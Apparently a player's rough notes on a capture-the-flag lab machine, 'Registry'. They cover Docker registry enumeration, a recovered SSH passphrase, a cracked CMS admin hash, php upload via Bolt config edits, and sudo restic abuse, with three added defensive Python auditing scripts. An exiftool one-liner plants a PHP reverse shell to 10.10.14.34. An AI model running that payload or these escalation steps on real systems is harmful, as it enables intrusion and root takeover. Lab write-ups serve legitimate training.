Nov 07, 2019, 08:36 AM

nmap -A 10.10.10.159
Starting Nmap 7.70 ( https://nmap.org ) at 2019-11-04 10:09 CET
Nmap scan report for 10.10.10.159
Host is up (0.18s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 72:d4:8d:da:ff:9b:94:2a:ee:55:0c:04:30:71:88:93 (RSA)
| 256 c7:40:d0:0e:e4:97:4a:4f:f9:fb:b2:0b:33:99:48:6d (ECDSA)
|_ 256 78:34:80:14:a1:3d:56:12:b4:0a:98:1f:e6:b4:e8:93 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Welcome to nginx!
443/tcp open ssl/http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Welcome to nginx!
| ssl-cert: Subject: commonName=docker.registry.htb
| Not valid before: 2019-05-06T21:14:35
|_Not valid after: 2029-05-03T21:14:35
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

echo 10.10.10.159 docker.registry.htb >> /etc/hosts
echo 10.10.10.159 registry.htb >> /etc/hosts

--------------------------------------------------------------------------

GENERATED WORDS: 4612

---- Scanning URL: http://docker.registry.htb/ ----
+ http://docker.registry.htb/v2 (CODE:301|SIZE:39)

dirb https://docker.registry.htb

-----------------

GENERATED WORDS: 4612

---- Scanning URL: https://docker.registry.htb/ ----
+ https://docker.registry.htb/v2 (CODE:301|SIZE:39)

--------------------------------------------------------------------------

https://docker.registry.htb/v2/ admin admin

/install
/install/index.php <-------------------- gzip with CA

/backup.php

ca.crt (owner www-data)
-----BEGIN CERTIFICATE----- ... -----END CERTIFICATE-----

readme.md (owner www-data)
# Private Docker Registry

- https://docs.docker.com/registry/deploying/
- https://docs.docker.com/engine/security/certificates/

/v2/image /manifest

download the docker images and find the bolt user and the root certificate

password in the certificate's sh files.

use the certificate

dirbuster http://docker.registry.htb

The methodology for getting the catalog size is:

 GET /v2/_catalog?n=300 (more than our repo count)
 for each repository returned, GET /v2/[repository_path]/tags/list
 for each tag listed, GET /v2/[repository_path]/manifests/[tag]
 from the manifest returned, HEAD /v2/[repository_path]/blobs/[blob_checksum]
 store the content-length header

v2/_catalog
{"repositories":["bolt-image"]}

ytc0ytdmnzywnzgxngi0zte0otm3ywzi

https://github.com/docker/distribution/issues/2212

docker enumeration ---> manifest ----> pointers to compressed files

docker registry garbage. user bolt, registry.htb/bolt and the github cms

::::::::::::::::::::::::::::

http://docker.registry.htb/v2/ admin admin

http://docker.registry.htb/v2/_catalog?n=300
{"repositories":["bolt-image"]}

http://docker.registry.htb/v2/bolt-image/tags/list
{"name":"bolt-image","tags":["latest"]}

http://docker.registry.htb/v2/bolt-image/manifests/latest

{
  "schemaVersion": 1,
  "name": "bolt-image",
  "tag": "latest",
  "architecture": "amd64",
  "fsLayers": [
    { "blobSum": "sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b" },
    { "blobSum": "sha256:3f12770883a63c833eab7652242d55a95aea6e2ecd09e21c29d7d7b354f3d4ee" },
    { "blobSum": "sha256:02666a14e1b55276ecb9812747cb1a95b78056f1d202b087d71096ca0b58c98c" },
    { "blobSum": "sha256:c71b0b975ab8204bb66f2b659fa3d568f2d164a620159fc9f9f185d958c352a7" },
    { "blobSum": "sha256:2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791" },
    { "blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4" },
    { "blobSum": "sha256:f5029279ec1223b70f2cbb2682ab360e1837a2ea59a8d7ff64b38e9eab5fb8c0" },
    { "blobSum": "sha256:d9af21273955749bb8250c7a883fcce21647b54f5a685d237bc6b920a2ebad1a" },
    { "blobSum": "sha256:8882c27f669ef315fc231f272965cd5ee8507c0f376855d6f9c012aae0224797" },
    { "blobSum": "sha256:f476d66f540886e2bb4d9c8cc8c0f8915bca7d387e536957796ea6c2f8e7dfff" }
  ],
  "history": [
    { "v1Compatibility": "{\"architecture\":\"amd64\",\"config\":{\"Hostname\":\"e2e880122289\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":true,\"AttachStdout\":true,\"AttachStderr\":true,\"Tty\":true,\"OpenStdin\":true,\"StdinOnce\":true,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"bash\"],\"Image\":\"docker.registry.htb/bolt-image\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":{}},\"container\":\"e2e88012228993b25b697ee37a0aae0cb0ecef7b1536d2b8e488a6ec3f353f14\",\"container_config\":{\"Hostname\":\"e2e880122289\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":true,\"AttachStdout\":true,\"AttachStderr\":true,\"Tty\":true,\"OpenStdin\":true,\"StdinOnce\":true,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"bash\"],\"Image\":\"docker.registry.htb/bolt-image\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":{}},\"created\":\"2019-05-25T15:18:56.9530238Z\",\"docker_version\":\"18.09.2\",\"id\":\"f18c41121574af38e7d88d4f5d7ea9d064beaadd500d13d33e8c419d01aa5ed5\",\"os\":\"linux\",\"parent\":\"9380d9cebb5bc76f02081749a8e795faa5b5cb638bf5301a1854048ff6f8e67e\"}" },
    { "v1Compatibility": "{\"id\":\"9380d9cebb5bc76f02081749a8e795faa5b5cb638bf5301a1854048ff6f8e67e\",\"parent\":\"d931b2ca04fc8c77c7cbdce00f9a79b1954e3509af20561bbb8896916ddd1c34\",\"created\":\"2019-05-25T15:13:31.3975799Z\",\"container_config\":{\"Cmd\":[\"bash\"]}}" },
    { "v1Compatibility": "{\"id\":\"d931b2ca04fc8c77c7cbdce00f9a79b1954e3509af20561bbb8896916ddd1c34\",\"parent\":\"489e49942f587534c658da9060cbfc0cdb999865368926fab28ccc7a7575283a\",\"created\":\"2019-05-25T14:57:27.6745842Z\",\"container_config\":{\"Cmd\":[\"bash\"]}}" },
    { "v1Compatibility": "{\"id\":\"489e49942f587534c658da9060cbfc0cdb999865368926fab28ccc7a7575283a\",\"parent\":\"7f0ab92fdf7dd172ef58247894413e86cfc60564919912343c9b2e91cd788ae4\",\"created\":\"2019-05-25T14:47:52.6859489Z\",\"container_config\":{\"Cmd\":[\"bash\"]}}" },
    { "v1Compatibility": "{\"id\":\"7f0ab92fdf7dd172ef58247894413e86cfc60564919912343c9b2e91cd788ae4\",\"parent\":\"5f7e711dba574b5edd0824a9628f3b91bfd20565a5630bbd70f358f0fc4ebe95\",\"created\":\"2019-05-24T22:51:14.8744838Z\",\"container_config\":{\"Cmd\":[\"/bin/bash\"]}}" },
    { "v1Compatibility": "{\"id\":\"5f7e711dba574b5edd0824a9628f3b91bfd20565a5630bbd70f358f0fc4ebe95\",\"parent\":\"f75463b468b510b7850cd69053a002a6f10126be3764b570c5f80a7e5044974c\",\"created\":\"2019-04-26T22:21:05.100534088Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) CMD [\\\"/bin/bash\\\"]\"]},\"throwaway\":true}" },
    { "v1Compatibility": "{\"id\":\"f75463b468b510b7850cd69053a002a6f10126be3764b570c5f80a7e5044974c\",\"parent\":\"4b937c36cc17955293cc01d8c7c050c525d22764fa781f39e51afbd17e3e5529\",\"created\":\"2019-04-26T22:21:04.936777709Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c mkdir -p /run/systemd \\u0026\\u0026 echo 'docker' \\u003e /run/systemd/container\"]}}" },
    { "v1Compatibility": "{\"id\":\"4b937c36cc17955293cc01d8c7c050c525d22764fa781f39e51afbd17e3e5529\",\"parent\":\"ab4357bfcbef1a7eaa70cfaa618a0b4188cccafa53f18c1adeaa7d77f5e57939\",\"created\":\"2019-04-26T22:21:04.220422684Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c rm -rf /var/lib/apt/lists/*\"]}}" },
    { "v1Compatibility": "{\"id\":\"ab4357bfcbef1a7eaa70cfaa618a0b4188cccafa53f18c1adeaa7d77f5e57939\",\"parent\":\"f4a833e38a779e09219325dfef9e5063c291a325cad7141bcdb4798ed68c675c\",\"created\":\"2019-04-26T22:21:03.471632173Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c set -xe \\t\\t\\u0026\\u0026 echo '#!/bin/sh' \\u003e /usr/sbin/policy-rc.d \\t\\u0026\\u0026 echo 'exit 101' \\u003e\\u003e /usr/sbin/policy-rc.d \\t\\u0026\\u0026 chmod +x /usr/sbin/policy-rc.d \\t\\t\\u0026\\u0026 dpkg-divert --local --rename --add /sbin/initctl \\t\\u0026\\u0026 cp -a /usr/sbin/policy-rc.d /sbin/initctl \\t\\u0026\\u0026 sed -i 's/^exit.*/exit 0/' /sbin/initctl \\t\\t\\u0026\\u0026 echo 'force-unsafe-io' \\u003e /etc/dpkg/dpkg.cfg.d/docker-apt-speedup \\t\\t\\u0026\\u0026 echo 'DPkg::Post-Invoke { \\\"rm -f /var/cache/apt/archives/*.deb /var/cache/apt/archives/partial/*.deb /var/cache/apt/*.bin || true\\\"; };' \\u003e /etc/apt/apt.conf.d/docker-clean \\t\\u0026\\u0026 echo 'APT::Update::Post-Invoke { \\\"rm -f /var/cache/apt/archives/*.deb /var/cache/apt/archives/partial/*.deb /var/cache/apt/*.bin || true\\\"; };' \\u003e\\u003e /etc/apt/apt.conf.d/docker-clean \\t\\u0026\\u0026 echo 'Dir::Cache::pkgcache \\\"\\\"; Dir::Cache::srcpkgcache \\\"\\\";' \\u003e\\u003e /etc/apt/apt.conf.d/docker-clean \\t\\t\\u0026\\u0026 echo 'Acquire::Languages \\\"none\\\";' \\u003e /etc/apt/apt.conf.d/docker-no-languages \\t\\t\\u0026\\u0026 echo 'Acquire::GzipIndexes \\\"true\\\"; Acquire::CompressionTypes::Order:: \\\"gz\\\";' \\u003e /etc/apt/apt.conf.d/docker-gzip-indexes \\t\\t\\u0026\\u0026 echo 'Apt::AutoRemove::SuggestsImportant \\\"false\\\";' \\u003e /etc/apt/apt.conf.d/docker-autoremove-suggests\"]}}" },
    { "v1Compatibility": "{\"id\":\"f4a833e38a779e09219325dfef9e5063c291a325cad7141bcdb4798ed68c675c\",\"created\":\"2019-04-26T22:21:02.724843678Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ADD file:7ce84f13f11609a50ece7823578159412e2299c812746d1d1f1ed5db0728bd37 in / \"]}}" }
  ],
  "signatures": [
    {
      "header": {
        "jwk": {
          "crv": "P-256",
          "kid": "BE5C:NOJP:EOC2:ERND:F2LL:EUKC:5KAA:FAKD:4WV3:SF5Z:T3BE:KD5F",
          "kty": "EC",
          "x": "AzGEIs7i0H7UBjuBNzAK81A6-fmLG1Pt2WLvxUsTBGI",
          "y": "rHfxYV5s6hLG5C6UYcSw6qW0Vd4ZvlI3JyGcBvFLJyI"
        },
        "alg": "ES256"
      },
      "signature": "Qm65jE1RNqpkHcj0_-MqJ8DnW11rZGR9jEbsDQFe4wWs4I8LuYEWyV6ktxpTy_0T-VQSMRLxSXpvxil0pi4H4Q",
      "protected": "eyJmb3JtYXRMZW5ndGgiOjY3OTIsImZvcm1hdFRhaWwiOiJDbjAiLCJ0aW1lIjoiMjAxOS0xMS0wNVQwODoyNDoyMVoifQ"
    }
  ]
}
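The catalog walk (catalog, tags, manifest, blobs) described earlier ends at a schema-1 manifest like the one just shown. This added example (not part of the original notes) parses such a manifest offline, pairs each fsLayers digest with its history build step, and skips throwaway/empty layers so an auditor knows which blobs actually need pulling and unpacking when checking an image for leaked files. The sample manifest is constructed: the digests are taken from the manifest above, the ids are placeholders.

```python
import json

# Well-known digest of an empty (gzipped empty tar) layer; in the manifest above
# it sits next to the history entry marked "throwaway": true.
EMPTY_LAYER = "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"


def parse_layers(manifest_text):
    """Pair fsLayers[i] with history[i] (schema 1 lists both newest-first)
    and return one record per layer describing what that build step did."""
    m = json.loads(manifest_text)
    if m.get("schemaVersion") != 1:
        raise ValueError("only schema-1 manifests carry v1Compatibility history")
    layers, history = m["fsLayers"], m["history"]
    if len(layers) != len(history):
        raise ValueError("fsLayers and history lengths differ")
    records = []
    for layer, hist in zip(layers, history):
        v1 = json.loads(hist["v1Compatibility"])  # JSON stored as a string
        cmd = (v1.get("container_config") or {}).get("Cmd") or []
        records.append({
            "digest": layer["blobSum"],
            "id": v1.get("id"),
            "created": v1.get("created"),
            "cmd": " ".join(cmd),
            # throwaway steps and the empty-layer digest carry no filesystem
            "empty": bool(v1.get("throwaway")) or layer["blobSum"] == EMPTY_LAYER,
        })
    return records


def blobs_to_inspect(records):
    """Unique, non-empty layer digests: the blobs worth downloading and
    unpacking when reviewing an image for credentials left in its files."""
    seen, out = set(), []
    for r in records:
        if not r["empty"] and r["digest"] not in seen:
            seen.add(r["digest"])
            out.append(r["digest"])
    return out


# Constructed sample in the shape of the manifest above: three layers, the
# middle one a throwaway CMD step; ids are shortened placeholders.
SAMPLE_MANIFEST = json.dumps({
    "schemaVersion": 1, "name": "bolt-image", "tag": "latest",
    "fsLayers": [
        {"blobSum": "sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b"},
        {"blobSum": EMPTY_LAYER},
        {"blobSum": "sha256:f476d66f540886e2bb4d9c8cc8c0f8915bca7d387e536957796ea6c2f8e7dfff"},
    ],
    "history": [
        {"v1Compatibility": json.dumps({"id": "aaa", "parent": "bbb",
            "created": "2019-05-25T15:18:56Z", "container_config": {"Cmd": ["bash"]}})},
        {"v1Compatibility": json.dumps({"id": "bbb", "parent": "ccc", "throwaway": True,
            "created": "2019-04-26T22:21:05Z",
            "container_config": {"Cmd": ["/bin/sh -c #(nop) CMD [\"/bin/bash\"]"]}})},
        {"v1Compatibility": json.dumps({"id": "ccc", "created": "2019-04-26T22:21:02Z",
            "container_config": {"Cmd": ["/bin/sh -c #(nop) ADD file:placeholder in / "]}})},
    ],
})

if __name__ == "__main__":
    recs = parse_layers(SAMPLE_MANIFEST)
    for r in recs:
        print(("skip " if r["empty"] else "pull ") + r["digest"][:19], r["created"], r["cmd"])
    print(blobs_to_inspect(recs))
```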

registry.htb/backup.php runs a php shell_exec that performs the backup <--------------

http://docker.registry.htb/v2/bolt-image/blobs/sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b

and likewise all the others up to sha256:f476d66f540886e2bb4d9c8cc8c0f8915bca7d387e536957796ea6c2f8e7dfff

we decompress them and look for information inside the containers

::::::::::::::
USEFUL INFO
::::::::::::::

bolt@bolt:/var/www/html$ netstat -an
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 127.0.0.1:5000 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN
tcp 0 316 10.10.10.159:22 10.10.14.34:53700 ESTABLISHED
tcp6 0 0 :::80 :::* LISTEN
tcp6 0 0 :::22 :::* LISTEN
udp 0 0 127.0.0.53:53 0.0.0.0:*

/var/www/html/sync.sh from vi????? not suid
/etc/profile.d/01-ssh.sh

#!/usr/bin/expect -f
#eval `ssh-agent -s`
spawn ssh-add /root/.ssh/id_rsa
expect "Enter passphrase for /root/.ssh/id_rsa:"
send "GkOcz221Ftb3ugog\n"; <--------- key of a certificate????
expect "Identity added: /root/.ssh/id_rsa (/root/.ssh/id_rsa)"
interact

git clone https://github.com/bolt/bolt.git <----- github????

ssh-keygen -t rsa -b 4096 -C "bolt@registry.htb"

www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

there is also a bolt user in other garbage

#!/bin/bash
rsync -azP registry:/var/www/html/bolt .   (this is sync.sh in /var/www/html)

.viminfo in /root has lots of information on commands run in vim. but vim is not suid

Found the keys in /root/.ssh; in practice the container's root is the bolt user

Host registry
 User bolt
 Port 22
 Hostname registry.htb

passphrase GkOcz221Ftb3ugog

System load: 0.0 Users logged in: 0
 Usage of /: 5.5% of 61.80GB IP address for eth0: 10.10.10.159
 Memory usage: 23% IP address for br-1bad9bd75d17: 172.18.0.1
 Swap usage: 0% IP address for docker0: 172.17.0.1

ok we're in..... let's grab user

bolt@bolt:~$ cat user.txt
ytc0ytdmnzywnzgxngi0zte0otm3ywzi
bolt@bolt:~$

bolt@bolt:/var/www/html$ cat backup.php
<?php shell_exec("sudo restic backup -r rest:http://backup.registry.htb/bolt bolt");

we can read it as a sudo -l... but as which user???? it isn't ALL

sudo restic backup -r rest:http://backup.registry.htb/bolt bolt

https://github.com/restic/restic

the backup does the download since it uses a restful api. files under the destination folder are written as www-data.
add a file in
http://backup.registry.htb/bolt to get it written into bolt????

bolt@bolt:/var/www/html/bolt$ ls
app codeception.yml composer.lock extensions index.php phpunit.xml.dist src theme
changelog.md composer.json CONTRIBUTING.md files LICENSE.md README.md tests vendor

subsite at

http://registry.htb/bolt/ <-------------

find ./ -name *.db
./vendor/codeception/codeception/tests/data/sqlite.db
./tests/phpunit/unit/resources/db/bolt.db
./app/database/bolt.db

find ./ -name login*
./vendor/codeception/codeception/tests/data/app/view/login.php
./app/view/twig/login
./app/view/twig/login/login.twig

scp -i id_rsa bolt@registry.htb:/var/www/html/bolt/app/database/bolt.db ./database.db

we use sqlitebrowser. important data

we find admin
$2y$10$e.ChUytg9SrL7AsboF2bX.wWKQ1LkS5Fi3/Z0yYD86.P5E9cpY7PK
["files://shell.php"]

Cost 1 (iteration count) is 1024 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status

strawberry (?) <-----------

1g 0:00:00:12 DONE (2019-11-05 10:33) 0.08143g/s 26.62p/s 26.62c/s 26.62C/s strawberry..dennis
Use the "--show" option to display all of the cracked passwords reliably
Session completed

to write into bolt and add a file for the site to execute, e.g. shell.php, you have to be www-data, the only one who
can write in html/bolt

lateral movement. root, on the other hand, runs backup.php <------

create a file on the bolt web site and run the backup as www-data, who can read the history and run sudo restic (root shell)

cd bolt

lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
statd:x:110:65534::/var/lib/nfs:/usr/sbin/nologin
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
bolt:x:1001:1001::/home/bolt:/bin/bash
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
git:x:1000:33::/var/www/html:/bin/bash

bolt ---> git -----> www-data (.bash_history)???? ----> root

we have admin strawberry. create a page on /bolt and run the backup as www-data <-----------------

http://backup.registry.htb/bolt/bolt/login <----- github

login admin strawberry

http://backup.registry.htb/bolt/bolt/files <----- as in the db stack

files://

themes://base-2018

I upload a file under theme and call backup.php, which saves it for me as www-data <----------------------

I allow files with the php extension [THE YAML FILE CANNOT BE SAVED]

http://backup.registry.htb/bolt/bolt/file/edit/config/config.yml

# never allowed: sh, asp, cgi, php, php3, ph3, php4, ph4, php5, ph5, phtm, phtml
accept_file_types: [ php, twig, html, js, css, scss, gif, jpg, jpeg, png, ico, zip, tgz, txt, md, doc, docx, pdf, epub, xls, xlsx, ppt, pptx, mp3, ogg, wav, m4a, mp4, m4v, ogv, wmv, avi, webm, svg]
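Bolt's own config comment lists the extensions that must never be accepted, and the edited line above adds php anyway. This added check (not from the notes and not Bolt's code) parses the accept_file_types line, reports any never-allowed extension, and rewrites the list without them, so an admin can catch a weakened upload allowlist before it is deployed. The sample config is constructed from the line above, with the list shortened and a couple of case/quoting variants added.

```python
import re

# Extensions Bolt's config comment says are never allowed (copied from the
# config.yml comment above).
NEVER_ALLOWED = {"sh", "asp", "cgi", "php", "php3", "ph3", "php4", "ph4",
                 "php5", "ph5", "phtm", "phtml"}

# Matches the single-line YAML flow list `accept_file_types: [ a, b, c ]`.
LINE_RE = re.compile(
    r"^[ \t]*accept_file_types[ \t]*:[ \t]*\[(?P<items>[^\]]*)\][ \t]*$",
    re.MULTILINE)


def accepted_types(config_text):
    """Extensions listed in accept_file_types, unquoted and lower-cased."""
    m = LINE_RE.search(config_text)
    if not m:
        raise ValueError("accept_file_types flow list not found")
    items = m.group("items").split(",")
    return [i.strip().strip("'\"").lower() for i in items if i.strip()]


def forbidden_types(config_text):
    """Listed extensions that would let an upload be executed as PHP/CGI."""
    return sorted(set(accepted_types(config_text)) & NEVER_ALLOWED)


def harden(config_text):
    """Return the config with the forbidden extensions dropped from the list."""
    kept = [t for t in accepted_types(config_text) if t not in NEVER_ALLOWED]
    new_line = "accept_file_types: [ " + ", ".join(kept) + " ]"
    return LINE_RE.sub(lambda _m: new_line, config_text, count=1)


# Constructed sample: the weakened line from the notes above, shortened, with
# one upper-case and one quoted entry to exercise the normalisation.
WEAKENED = """# never allowed: sh, asp, cgi, php, php3, ph3, php4, ph4, php5, ph5, phtm, phtml
accept_file_types: [ PHP, twig, html, js, css, scss, gif, jpg, png, zip, txt, 'phtml' ]
"""

if __name__ == "__main__":
    print("forbidden:", forbidden_types(WEAKENED))
    print(harden(WEAKENED))
```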

and what if instead I upload it

ls -lisa /var/backups
total 111292
2883586 4 drwxr-xr-x 2 root root 4096 May 29 11:05 .
2883585 4 drwxr-xr-x 14 root root 4096 May 19 22:19 ..
2886019 111284 -rw-r--r-- 1 root root 113953155 May 29 11:04 bolt.tgz <----?????

2891781 0 -rw------- 1 git www-data 0 Oct 8 21:54 .bash_history

bolt@bolt:/var/www/html/install$ ls
index.php
bolt@bolt:/var/www/html/install$ cat index.php <--- binary data, ca.crt

---------------------------------------

exiftool -Comment='<?php echo system('/bin/sh -i >& /dev/tcp/10.10.14.34/8000 0>&1'); ?>' ./Desktop/1.png

CMS Bolt - Arbitrary File Upload (Metasploit) | exploits/php/remote/38196.rb

real site http://registry.htb/bolt/bolt/login

modify config.yml from registry.htb and, immediately before a backup, upload the php file, which then runs for us as
www-data.

sudo -l: www-data runs the backup. when the backup starts the site gets overwritten

http://registry.htb/bolt/bolt/file/edit/config/config.yml
http://registry.htb/bolt/bolt/files
http://registry.htb/bolt/files/mytest.php?a846763cc3

Matching Defaults entries for www-data on bolt:
env_reset, exempt_group=sudo, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bolt: (root) NOPASSWD: /usr/bin/restic backup -r rest*

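The sudo rule above ends in a wildcard (`rest*`), and sudoers wildcards in arguments also match spaces, which is why the `backup -r rest --help` call further down is accepted. This added checker (not part of the original notes) parses `sudo -l` output, flags wildcard arguments and NOPASSWD root rules, and compares the rule with a pinned version. The sample output is constructed from the lines above; the pinned rule is an assumption of how the same backup could be granted without the wildcard.

```python
import re

# One rule as `sudo -l` prints it: "(runas) [TAG: ...] /path/to/cmd [args]".
RULE_RE = re.compile(r"\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>/.+)$")


def parse_rules(sudo_l_output):
    """Return [{runas, tags, cmd}] for every rule line in `sudo -l` output."""
    rules = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.search(line)
        if not m:
            continue  # "Matching Defaults entries" and similar lines
        tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
        rules.append({"runas": m.group("runas"), "tags": tags,
                      "cmd": m.group("cmd").strip()})
    return rules


def audit_rule(rule):
    """Weaknesses of one rule; an empty list means nothing was flagged."""
    findings = []
    prog, _, args = rule["cmd"].partition(" ")
    if any(ch in prog for ch in "*?["):
        findings.append("wildcard in program path: more than one binary matches")
    if any(ch in args for ch in "*?["):
        findings.append("wildcard in arguments: sudoers wildcards also match "
                        "spaces, so extra arguments can be appended (pin the "
                        "full argument list instead)")
    if "NOPASSWD" in rule["tags"] and rule["runas"] == "root" and findings:
        findings.append("runs as root without a password, so the above is "
                        "reachable by anyone who can run code as this user")
    return findings


# Constructed samples: the output recorded above, and a pinned alternative.
WEAK = """Matching Defaults entries for www-data on bolt:
env_reset, exempt_group=sudo, mail_badpass,
secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin
User www-data may run the following commands on bolt: (root) NOPASSWD: /usr/bin/restic backup -r rest*
"""
PINNED = ("User www-data may run the following commands on bolt:\n"
          "    (root) NOPASSWD: /usr/bin/restic backup -r "
          "rest:http://backup.registry.htb/bolt bolt\n")

if __name__ == "__main__":
    for label, text in (("weak", WEAK), ("pinned", PINNED)):
        for rule in parse_rules(text):
            print(label, rule["cmd"], audit_rule(rule) or "ok")
```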
<?php shell_exec("sudo restic backup -r rest:http://backup.registry.htb/bolt bolt");

by default, without echo, php gives us no stdout. run the php shell with >

<?php
echo "Avvio shell...<br>";
echo system("sudo restic backup -r rest --help");

Avvio shell...
The "backup" command creates a new snapshot and saves the files and directories given as the arguments.
Usage: restic backup [flags] FILE/DIR [FILE/DIR] ...
Flags: -e, --exclude pattern exclude a pattern (can be specified multiple times) --exclude-caches excludes cache directories that are marked with a CACHEDIR.TAG file --exclude-file file read exclude patterns from a file (can be specified multiple times) --exclude-if-present stringArray takes filename[:header], exclude contents of directories containing filename (except filename itself) if header of that file is as provided (can be specified multiple times) --files-from string read the files to backup from file (can be combined with file args) -f, --force force re-reading the target files/directories (overrides the "parent" flag) -h, --help help for backup --hostname hostname set the hostname for the snapshot manually. To prevent an expensive rescan use the "parent" flag -x, --one-file-system exclude other file systems --parent string use this parent snapshot (default: last snapshot in the repo that has the same target files/directories) --stdin read backup from stdin --stdin-filename string file name to use when reading from stdin (default "stdin") --tag tag add a tag for the new snapshot (can be specified multiple times) --time string time of the backup (ex. '2012-11-01 22:08:41') (default: now) --with-atime store the atime for all files and directories
Global Flags: --cacert stringSlice path to load root certificates from (default: use system certificates) --cache-dir string set the cache directory --cleanup-cache auto remove old cache directories --json set output mode to JSON for commands that support it --limit-download int limits downloads to a maximum rate in KiB/s. (default: unlimited) --limit-upload int limits uploads to a maximum rate in KiB/s. (default: unlimited) --no-cache do not use a local cache --no-lock do not lock the repo, this allows some operations on read-only repos -o, --option key=value set extended option (key=value, can be specified multiple times) -p, --password-file string read the repository password from a file (default: $RESTIC_PASSWORD_FILE) -q, --quiet do not output comprehensive progress report -r, --repo string repository to backup to or restore from (default: $RESTIC_REPOSITORY) --tls-client-cert string path to a file containing PEM encoded TLS client certificate and private key

:::::::::::::::::::::::::::::::::::::::::::::::::::::::

set up a rest server under /temp as bolt
https://github.com/restic/rest-server/blob/master/cmd/rest-server/main.go ?????
this way the backup.registry.htb rule should be satisfied too

or else

https://computingforgeeks.com/best-secure-backup-program/

$ sudo restic autocomplete

Usage:
 restic autocomplete [flags]

Flags:
 --completionfile string autocompletion file (default "/etc/bash_completion.d/restic.sh")